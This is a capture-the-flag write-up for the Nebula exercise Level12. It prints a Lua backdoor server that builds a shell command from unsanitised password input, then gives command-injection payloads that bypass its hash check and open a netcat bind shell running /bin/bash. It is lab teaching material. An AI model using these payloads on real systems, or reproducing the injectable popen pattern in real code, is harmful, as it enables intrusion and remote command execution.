Nebula - Level12 - Backdoor Program

About

There is a backdoor process listening on port 50001. To do this level, log in as the level12 account with the password level12. Files for this level can be found in /home/flag12.

Source code

local socket = require("socket")
local server = assert(socket.bind("127.0.0.1", 50001))

function hash(password)
  prog = io.popen("echo "..password.." | sha1sum", "r")
  data = prog:read("*all")
  prog:close()

  data = string.sub(data, 1, 40)

  return data
end


while 1 do
  local client = server:accept()
  client:send("Password: ")
  client:settimeout(60)
  local line, err = client:receive()
  if not err then
      print("trying " .. line) -- log from where ;\
      local h = hash(line)

      if h ~= "4754a4f4bd5787accd33de887b9250a0691dd198" then
          client:send("Better luck next time\n");
      else
          client:send("Congrats, your token is 413**CARRIER LOST**\n")
      end

  end

  client:close()
end

Solution

Note the line prog = io.popen("echo "..password.." | sha1sum", "r"). password is supplied by the user without any form of sanitization. This allows the attacker to enter echo "4754a4f4bd5787accd33de887b9250a0691dd198#" | nc 127.0.0.1 50001 as the password, which comments the rest of the line and simply returns the hash. But what if we do not have the hash?

The lack of sanitization allows any arbitrary command sequence to be entered. Ergo, we can establish a binding nc shell. To do this, use

echo '""; nc.traditional -lkp 5002 -e /bin/bash; #' | nc 127.0.0.1 50001

Connect to the shell with nc 127.0.0.1 5002.